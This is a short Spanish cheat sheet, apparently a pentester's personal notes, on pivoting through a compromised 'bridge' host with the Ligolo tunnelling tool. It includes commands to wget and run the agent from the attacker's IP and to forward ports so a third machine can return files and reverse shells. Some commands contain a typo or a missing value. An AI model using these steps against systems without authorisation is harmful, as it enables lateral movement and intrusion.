🐇Ligolo

-------- gracias a @xerosec por la explicación de esta herramienta uwu -------

Preparativos

Crear interfaz de red modo tunnel

sudo ip tuntap add user $USER mode tun ligolo

# levantamos la interfaz
sudo ip link set ligolo up

Añadir route hacia el segmento de red objetivo a través del dispositivo de red ligolo

sudo ip route add <segmento/x> dev ligolo

Pivoting

Activar el proxy en máquina atacante

chmod +x proxy
./proxy -selfcert

Transferir agent a la máquina puente

cd /tmp
wget http://<IPa>/agent # transferimos agent
chmod +x agent

Conectar máquina puente a máquina atacante

./agent -connect <IPa>:<ligolo-port> -ignore-cert

Establecer tunnel desde máquina atacante

session
# seleccionar número sesión en caso de existir varias
start

ping <IP> # comprobamos alcance a tercera máquina

Port Forwarding

Pese a que nosotros tenemos alcance con la tercera máquina mediante este tunnel, la tercera máquina no puede alcanzar nuestra máquina atacante. Esto nos limitaría a la hora de transferir archivos y recibir conexiones (reverse shells)

Añadir listener para redirigir flujo de puertos

listener_add --addr  --to 127.0.0.1:80
listerner_list

Ya podríamos usar el puerto de la máquina puente para transferir archivos a nuestra máquina atacante desde la tercera máquina.

Última actualización hace 3 meses